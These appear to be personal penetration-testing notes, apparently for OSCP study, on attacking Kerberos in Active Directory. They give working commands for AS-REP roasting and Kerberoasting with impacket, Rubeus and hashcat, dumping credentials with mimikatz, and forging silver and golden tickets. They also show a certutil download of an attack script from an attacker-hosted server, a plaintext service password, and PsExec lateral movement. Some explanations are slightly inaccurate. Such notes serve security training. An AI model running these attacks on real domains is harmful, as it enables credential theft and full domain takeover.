Basics
- TCP/88 and UDP/88
- Kerberos is an authentication protocol.
- Not an authorization protocol!
- It authenticates a user, but each service who uses it has to authorize the user!
- The components of a Kerberos system are
- a user or client,
- an Application Server AP who offers a service and
- the Key Distribution Center KDC.
- Issues tickets
- Installed on the Domain Controller
- Ticket types:
- Ticket Granting Service TGS: Ticket with which a user authenticate against an application server.
- Ticket Granting Ticket TGT: Ticket for the KDC to request a TGS.
- Windows stores password hashes in the LSASS Local Security Authority Subsystem Service.
Authentication sequence for an user to log in on a domain (controller):
- Client sends a AS-REQ Authentication Server Request to the DC with
- the Timestamp, encrypted with the user’s password hash (which the DC also has)
- DC decrypts the message with the user’s hash. If the timestamp is valid and not already used, the DC notes this user as logged in and returns it to the client.
Authentication sequence for an authenticated user on a local system:
- Client requests from KDC a TGT
- Request contains
- timestamp,
- SPN (requested service),
- user name and
- user NONCE
- Request contains
- KDC sends to the client a TGT
- KDC checks timestamp
- Client requests from KDC a TGS
- Request contains
- TGT
- new timestamp
- Request contains
- KDC sends to the client a TGS
- Client sends TGS to Application Server AP
- Optional: The AP verifies the client’s request agains the KDC.
Terminology
Kerberoasting means an offline cracking of the password in the NTLM hash. Useless if the service runs as service user. Then, the password will be replaced by a 128 character long password each 30 days automatically. Possible if the service runs as normal user who maybe chose a weak password.
Attacks
AS-REP-Roasting
A Kerberoasting attack which doesn’t need shell access. DO THIS ALSO if you have already credentials!
Tries to find out usernames for which no pre-authentication is required. For these users, everybody can request a initial TGT, which contains the original user key, encrypted by the user’s password. This can be breaked.
- Create list with users.
- Use GetNPUsers.py to harvest non-preauth responses from the DC.
WARNING: It can be that no success is shown BUT THE FILE EXISTS with a hash! -
GetNPUsers.py svcorp.com/USERNAME -dc-ip 10.11.1.20 -usersfile kerberos-found-users.txt -format hashcat -outputfile /tmp/hashes.asreproast
- Crack it with hashcat.
/opt/hashcat/hashcat -m18200 -a0 -O --session name_der_sitzung --self-test-disable /tmp/test.hash /opt/rockyou.txt
Alternative: Request Ticket via:
python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py $domain/$user:$password -dc-ip $target -request
Alternative: Request ticket via Rubeus (compiled exe is in the enum directory)
Rubeus.exe kerberoast /creduser:active.htb\SVC_TGS /dc:$target /credpassword:GPPstillStandingStrong2k18 /outfile:h.txt
Service Account Attack
A Kerberoasting attack which needs shell access.
Request service ticket from the DC. In the first step, no authentication is required, so everybody can do this.
With Rubeus
- Upload Rubeus (see Github or the p61.general directory)
- Execute
Rubeus.exe kerberoast /outfile:hashes.kerberoast - Break found hashes with hashcat and mode 13100.
Manually in Powershell
- Open Powershell
- User PowerView to obtain the serviceprincipalname from a service. (E.g. via the oscp-enum-script.ps1 script / see escalation_scripts directory.) Make sure that you are logged in in a domain and not in a local account! Lets say the following was found:
serviceprincipalname {HTTP/CorpWebServer.corp.com} - Then, create a service ticket from the DC via PowerShell:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/CorpWebServer.corp.com' - Direct after this execution, the memory holds the ticket. It can be shown with
klist
- Execute mimikatz.exe (as a user!) and export all cached tickets with
kerberos::list /export
- Transer the exported files to the local system.
- Crack the hashes
python /usr/share/kerberoast/tgsrepcrack.py wordlist.txt 1-40a50000-offsec@HTTP~CorpWebServer.corp.com-CORP.COM.kirbi
Alternative:
- Upload Invoke-Kerberoast.ps1
certutil.exe -urlcache -split -f "http://192.168.119.158:8000/Invoke-Kerberoast.ps1" Invoke-Kerberoast.ps1
- Perform step three from before to make sure that tickets are in the cache.
- Grab hashs for Hashcat
powershell -exec bypass
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat hashcat - Break them
/opt/hashcat/hashcat -m13100 -a0 -O --self-test-disable kerberos-raw.txt /opt/all_seclist_with_rockyou.txt
Silver Ticket attack (one service)
Required:
- Hash for a password of a service account
- Domain SID
- Target SPN
Background:
- A TGS Ticket Granting Service is received and checked from a service to determine if we can access it.
- The TGS is encrypted with the hash of the password of the service account.
- The TGS contains the permissions for the server.
- Therefore: If we have the hash of the password from a service account, we can create our own TGS with the permissions we want.
Get the requirements:
- Get the Hash of the service account
- Use mimikatz and
privilege::debug, sekurlsa::logonpasswordsto get the NTLM hash e.g. from the iis_service
- Use mimikatz and
- Get the Domain SID
- The domain SID is ABC from ABCD (see the Windows security fundamentals). Just get some user’s id, like with
whoami /userand take the SID without the last part. - Example: We got S‑1–5‑21–1987370270-658905905–1781884369-1105. Then, the Domain SID = S‑1–5‑21–1987370270-658905905–1781884369.
- The domain SID is ABC from ABCD (see the Windows security fundamentals). Just get some user’s id, like with
- Target SPN
Then, use mimikatz to create a silver ticket on the system for a given user. (Note: mimikatz kerberos:golden creates silver and golden tickets…) Here, for example for the IIS service on the web1.dom.ain host.
kerberos::golden
/sid:S-1-5-21-1987370270-658905905-1781884369
/domain:dom.ain
/ptt
/target:web1.dom.ain
/service:http
/rc4:$ntlmHash
/user:$userToInject
To check if it worked: Exit mimikatz and execute the klist command. The ticket should be visible there.
Golden Ticket attack (all services)
Required:
- Hash of the password of the krbtgt domain account or access to an administrative domain group user.
- Domain SID
Background:
- The DC/KDC encrypts the TGT with the password hash of the domain user krbtgt.
- If we got this users NTLM hash, then we can create TGTs for all services and users — a golden ticket.
Get the requirements:
- To get the krbtgt’s hash: As a user in the administrative domain group, execute mimikatz and note the NTLM hash of the krbtgt account:
privilege::debug
lsadump::lsa /patch - To get the Domain SID: See the first line after the previous lsadump command.
Now, on some compromised domain computer with some account $currentUser in mimikatz:
kerberos::purge // to remove other tickets which may be used before our golden ticket.
kerberos::golden /user:$currentUser /domain:dom.ain /sid:$sid /krbtgt:$krbtgthash /ptt
Create a new cmd session out of mimikatz:
misc::cmd
Now you can authenticate to any service in the domain.
Important: Use the smb name and not the domain, because the ticket would not be used if it is for the smb name and not for the IP!
PsExec64.exe \\dc01 cmd.exe // works
PsExec64.exe \\10.10.10.1 cmd.exe // works not
Note: As soon as a Golden Ticket was generated, the domain owner has to change the krbtgt’s password twice. Because the last two passwords are valid…
Pass The Hash (PTH)
Required: Username and NTML hash.
- Get the users hash from SAM files or the memory
- Use this hash to authenticate against the KDC to obtain tickets for various services
- Use getTGT.py to obtain a hash for a given user account.
Pass the Ticket (PTT)
- Get a real ticket from the user by a Man-in-the-Middle attack.
- Or directly from a system via Mimikatz. (Source and demo for Linux and Windows.)
Leave a Reply
You must be logged in to post a comment.